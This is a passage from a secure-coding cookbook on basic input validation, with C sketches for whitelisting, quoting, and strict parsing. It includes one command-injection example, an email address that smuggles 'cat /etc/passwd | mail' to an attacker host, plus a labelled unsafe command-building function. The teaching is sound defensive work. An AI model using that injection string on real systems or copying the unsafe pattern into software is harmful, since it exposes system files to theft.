3.1 Understanding Basic Data Validation Techniques
3.1.1 Problem
You have data coming into your
application, and you would like to filter or reject data that might
be malicious.
3.1.2 Solution
Perform data validation at all levels
whenever possible. At the very least, make sure data is filtered on
input.
Match constructs that are known to be valid and harmless. Reject
anything else.
In addition, be sure to be skeptical about any data coming from a
potentially insecure channel. In a client-server architecture, for
example, even if you wrote the client, the server should never assume
it is talking to a trusted client.
3.1.3 Discussion
Applications should not trust any external input. We have often seen
situations in which people had a custom client-server application and
the application developer assumed that, because the client was
written in house by trusted, strong coders, there was nothing to
worry about in terms of malicious data being injected.
Those kinds of assumptions lead people to do things that turn out
badly, such as embedding in a client SQL queries or shell commands
that get sent to a server and executed. In such a scenario, an
attacker who is good at reverse engineering can replace the SQL code
in the client-side binary with malicious SQL code (perhaps code that
reads private records or deletes important data). The attacker could
also replace the actual client with a handcrafted client.
In many situations, an attacker who does not even have control over
the client is nevertheless able to inject malicious data. For
example, he might inject bogus data into the network stream.
Cryptography can sometimes help, but even then, we have seen
situations in which the attacker did not need to send data that
decrypted properly to cause a problem. For example, malformed data
might trigger a buffer overflow in the portion of an application that
does the decryption.
You can regard input validation as a kind of access
control mechanism. For example, you will generally want to validate
that the person on the other end of the connection has the right
credentials to perform the operations that she is requesting.
However, when you're doing data validation, most
often you'll be worried about input that might do
things that no user is supposed to be able to do.
For example, an access control mechanism might determine whether a
user has the right to use your application to send email. If the user
has that privilege, and your software calls out to the shell to send
email (which is generally a bad idea), the user should not be able to
manipulate the data in such a way that he can do anything other than
send mail as intended.
Let's look at basic rules for proper data validation:
- Assume all input is guilty until proven otherwise.
-
As we said earlier, you should never trust input that comes
from outside the trusted base. In addition, you should be very
skeptical about which components of the system are trusted, even
after you have authenticated the user on the other end!
- Prefer rejecting data to filtering data.
-
If you determine that a piece of data might possibly be malicious,
your best bet from a security perspective is to assume that using the
data will screw you up royally no matter what you do, and act
accordingly. In some environments, you might need to be able to
handle arbitrary data, in which case you will need to treat all input
in a way that ensures everything is benign. Avoid that situation if
possible, because it is a lot harder to get right.
- Perform data validation both at input points and at the component level.
-
One of the most important principles in computer security,
defense in depth, states that you should provide multiple
defenses against a problem if a single defense may fail. This is
important in input validation. You can check the validity of data as
it comes in from the network, and you can check it right before you
use the data in a manner that might possibly have security
implications. However, each one of these techniques alone is somewhat
error-prone.
When you're checking input at the points where data
arrives, be aware that components might get ripped out and matched
with code that does not do the proper checking, making the components
less robust than they should be. More importantly, when data is fresh
from the network, it is often very difficult to understand enough
about its context to validate it easily.
That is, routines that read from a socket usually do not understand
anything about the state the application is in. Without such
knowledge, input routines can do only rudimentary filtering.
On the other hand, when you're checking input at the
point before you use it, it's often easy to forget
to perform the check. Most of the time, you will want to make life
easier by producing your own wrapper API to do the filtering, but
sometimes you might forget to call it or end up calling it
improperly. For example, many people try to use strncpy( ) to
help prevent buffer overflows, but it is easy to use this function in
the wrong way, as we discuss in Recipe 3.3.
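As a rough illustration of the wrapper idea, here is a minimal sketch of a checked copy routine. The name checked_copy and its return convention are our own assumptions for this example, not an API from any library, and the sketch assumes that the source string is already NUL-terminated. It rejects oversized input instead of truncating it, in keeping with the rule about preferring rejection to filtering.

```c
#include <stddef.h>
#include <string.h>

/*
 * Hypothetical wrapper (the name is illustrative only): copy src into dst
 * only if the whole string, including its terminating NUL, fits.
 * Returns 0 on success and -1 if the input was rejected.
 */
int checked_copy(char *dst, size_t dst_size, const char *src)
{
    size_t len;

    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;

    len = strlen(src);          /* assumes src is NUL-terminated */
    if (len >= dst_size) {
        dst[0] = '\0';          /* leave dst as a valid empty string */
        return -1;              /* reject rather than silently truncate */
    }

    memcpy(dst, src, len + 1);  /* len + 1 copies the NUL as well */
    return 0;
}
```

A caller would check the return value on every use and treat -1 as invalid input. The wrapper helps only if it is actually called everywhere the data is copied, which is exactly the weakness described above.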
- Do not accept commands from the user unless you parse them yourself.
-
Many data input problems involve the program's
passing off data that came from an untrusted source to some other
entity that actually parses and acts on the data. If the component
doing the parsing has to trust its caller, bad things can happen if
your software does not do the proper checking. The best-known example
of this is the Unix command shell. Sometimes, programs will
accomplish tasks by using functions such as system( ) or
popen( ) that invoke a shell (which
is often a bad idea by itself; see Recipe 1.7).
(We'll look at the shell input problem later in this
chapter.) Another popular example is the database query using the SQL
language. (We'll discuss input validation problems
with SQL in Recipe 3.11.)
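One way to picture "parsing it yourself" is a fixed command table: the program recognizes a small set of commands and refuses everything else, so nothing the user types is ever handed to another interpreter. The sketch below is illustrative only. The command names (STATUS, LIST, QUIT) and the function parse_command are hypothetical and stand in for whatever vocabulary your protocol defines.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical command set for illustration. */
typedef enum { CMD_INVALID = 0, CMD_STATUS, CMD_LIST, CMD_QUIT } command_t;

static const struct {
    const char *name;
    command_t   cmd;
} command_table[] = {
    { "STATUS", CMD_STATUS },
    { "LIST",   CMD_LIST   },
    { "QUIT",   CMD_QUIT   },
};

/*
 * Map untrusted input to one of the known commands. Only an exact match
 * is accepted; anything else, including a valid command with trailing
 * text, yields CMD_INVALID.
 */
command_t parse_command(const char *input)
{
    size_t i;

    if (input == NULL)
        return CMD_INVALID;

    for (i = 0; i < sizeof command_table / sizeof command_table[0]; i++) {
        if (strcmp(input, command_table[i].name) == 0)
            return command_table[i].cmd;
    }
    return CMD_INVALID;
}
```

The server then acts on the returned enumeration value, never on the original string, so input such as "LIST; rm -rf /" is simply rejected.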
- Beware of special commands, characters, and quoting.
-
One obvious thing to do when using a command language such as the
Unix shell or SQL is to construct commands in trusted software,
instead of allowing users to send commands that get proxied. However,
there is another "gotcha" here.
Suppose that you provide users the ability to search a database for a
word. When the user gives you that word, you may be inclined to
concatenate it to your SQL command. If you do not validate the input,
the user might be able to run other commands.
Consider what happens if you have a server application that, among
other things, can send email. Suppose that the email address comes
from an untrusted client. If the email address is placed into a
buffer using a format string like "/bin/mail %s < /tmp/email",
what happens if the user submits the following email address:
"dummy@address.com; cat /etc/passwd | mail some@attacker.org"?
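To make the danger concrete, the following sketch builds the command string the way the example describes, without executing it. The function name build_mail_command is our own, and the code is deliberately the unsafe pattern under discussion, shown only so that you can inspect the resulting string.

```c
#include <stdio.h>

/*
 * UNSAFE pattern, shown for illustration only: the untrusted address is
 * pasted straight into a shell command line. The function name is
 * hypothetical. Returns 0 on success, -1 if the result did not fit.
 */
int build_mail_command(char *out, size_t out_size, const char *address)
{
    int n = snprintf(out, out_size, "/bin/mail %s < /tmp/email", address);

    if (n < 0 || (size_t)n >= out_size)
        return -1;
    return 0;
}
```

With the address from the example, the buffer ends up holding "/bin/mail dummy@address.com; cat /etc/passwd | mail some@attacker.org < /tmp/email". A shell treats the semicolon as a command separator, so passing this string to system( ) would run a second pipeline of the attacker's choosing after the intended mail command.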
- Make policy decisions based on a "default deny" rule.
-
There are two different approaches to data filtering. With the first,
known as
whitelisting,
you accept input as valid only if it meets specific criteria.
Otherwise, you reject it. If you do this, the major thing you need to
worry about is whether the rules that define your whitelist are
actually correct!
With the other approach, known as
blacklisting,
you reject only those things that are known to be bad. It is much
easier to get your policy wrong when you take this approach.
For example, if you really want to invoke a mail program by calling a
shell, you might take a whitelist approach in which you allow only
well-formed email addresses, as discussed in Recipe 3.9. Or you might
use a slightly more liberal (less exact) whitelist policy in which
you only allow letters, digits, the @ sign, and periods.
With a blacklist approach, you might try to block out every character
that might be leveraged in an attack. It is hard to be sure that you
are not missing something here, particularly if you try to consider
every single operational environment in which your software may be
deployed. For example, if you are calling out to a shell, you might
look up all the special characters for the bash shell and check for
those, but leave people using tcsh (or something unusual)
open to attack.
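The more liberal whitelist policy mentioned above (letters, digits, the @ sign, and periods) can be sketched in a few lines. The function name is_allowed_address is hypothetical, and the sketch assumes an ASCII-compatible character set. It compares against explicit character ranges rather than calling isalnum( ), so that the result does not depend on the current locale.

```c
#include <stddef.h>

/*
 * Default-deny character check (illustrative name). Returns 1 only if
 * the string is non-empty and every character is an ASCII letter, an
 * ASCII digit, '@', or '.'. Anything else is rejected.
 */
int is_allowed_address(const char *s)
{
    size_t i;

    if (s == NULL || s[0] == '\0')
        return 0;

    for (i = 0; s[i] != '\0'; i++) {
        char c = s[i];

        if ((c >= 'a' && c <= 'z') ||
            (c >= 'A' && c <= 'Z') ||
            (c >= '0' && c <= '9') ||
            c == '@' || c == '.')
            continue;           /* explicitly allowed */

        return 0;               /* not on the whitelist: deny */
    }
    return 1;
}
```

This check accepts "dummy@address.com" and rejects any input containing a space, semicolon, or pipe character. It does not establish that the string is a well-formed email address; it only guarantees that none of the characters outside the list can reach the shell.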
- You can look for a quoting mechanism, but know how to use it properly.
-
Sometimes, you really do need to be
able to accept arbitrary data from an untrusted source and use that
data in a security-critical way. For example, you might want to be
able to put arbitrary contents from arbitrary documents into a
database. In such a case, you might look for some kind of quoting
mechanism. For example, you can usually stick untrusted data in
single quotes in such an environment.
However, you need to be aware of ways in which an attacker can leave
the quoted environment, and you must actively make sure that the
attacker does not try to use them. For example, what happens if the
attacker puts a single quote in the data? Will that end the quoting,
allowing the rest of the attacker's data to do
malicious things? If there are such escapes, you should check for
them. In this particular example, you might be able to replace quotes
in the attacker's data with a backslash followed by
a quote.
- When designing your own quoting mechanisms, do not allow escapes.
-
Following from the previous point, if you need to filter data instead
of rejecting potentially harmful data, it is useful to provide
functions that properly quote an arbitrary piece of data for you. For
example, you might have a function that quotes a string for a
database, ensuring that the input will always be interpreted as a
single string and nothing more. Such a function would put quotes
around the string and additionally escape anything that could thwart
the surrounding quotes (such as a nested quote).
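A quoting function of the kind just described might look like the following sketch. The name quote_string is hypothetical, and the escape rule is an assumption: we suppose a target that treats a backslash followed by a character as that literal character inside single quotes. Quoting rules differ between interpreters, so check the rules of the component you are actually feeding before relying on anything like this.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/*
 * Illustrative quoting helper (hypothetical name and escape rule).
 * Returns a newly allocated string consisting of s wrapped in single
 * quotes, with every single quote and backslash preceded by a
 * backslash. Returns NULL on error. The caller must free the result.
 */
char *quote_string(const char *s)
{
    size_t len, i, j = 0;
    char *out;

    if (s == NULL)
        return NULL;

    len = strlen(s);
    /* Worst case: every character escaped, plus two quotes and a NUL. */
    if (len > (SIZE_MAX - 3) / 2)
        return NULL;

    out = malloc(2 * len + 3);
    if (out == NULL)
        return NULL;

    out[j++] = '\'';
    for (i = 0; i < len; i++) {
        if (s[i] == '\'' || s[i] == '\\')
            out[j++] = '\\';    /* escape anything that could end the quoting */
        out[j++] = s[i];
    }
    out[j++] = '\'';
    out[j] = '\0';
    return out;
}
```

Note that the backslash itself is escaped along with the quote. Otherwise, input ending in a backslash would escape the closing quote that the function adds.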
- The better you understand the data, the better you can filter it.
-
Rough heuristics like "accept the following
characters" do not always work well for data
validation. Even if you filter out all bad characters, are the
resulting combinations of benign characters a problem? For example,
if you pass untrusted data through a shell, do you want to take the
risk that an attacker might be able to ignore metacharacters but
still do some damage by throwing in a well-placed shell keyword?
The best way to ensure that data is not bad is to do your very best
to understand the data and the context in which that data will be
used. Therefore, even if you're passing data on to
some other component, if you need to trust the data before you send
it, you should parse it as accurately as possible. Moreover, in
situations where you cannot be accurate, at least be conservative,
and assume that the data is malicious.
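As a small example of parsing data accurately instead of filtering characters, suppose a field is supposed to hold a TCP port number. That field is a hypothetical case chosen for illustration, as is the function name parse_port. Rather than merely checking that the input contains only digits, the sketch converts it and confirms that the entire string is a number in the valid range.

```c
#include <errno.h>
#include <stdlib.h>

/*
 * Illustrative strict parser (hypothetical name). Accepts only a plain
 * decimal number in the range 1 to 65535 with no sign, whitespace, or
 * trailing characters. Returns 0 and stores the value on success,
 * -1 on any doubt.
 */
int parse_port(const char *s, int *port)
{
    char *end;
    long v;

    if (s == NULL || port == NULL)
        return -1;
    if (s[0] < '0' || s[0] > '9')   /* rejects "", "-1", "+80", " 80" */
        return -1;

    errno = 0;
    v = strtol(s, &end, 10);
    if (errno != 0 || *end != '\0') /* overflow or trailing garbage */
        return -1;
    if (v < 1 || v > 65535)         /* outside the valid port range */
        return -1;

    *port = (int)v;
    return 0;
}
```

Input such as "80; ls" consists mostly of harmless-looking characters, yet it is rejected because it is not a port number. That is the conservative behavior recommended above: when the data does not match what you understand it to be, assume that it is malicious.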
3.1.4 See Also
Recipe 1.7, Recipe 3.3, Recipe 3.9, Recipe 3.11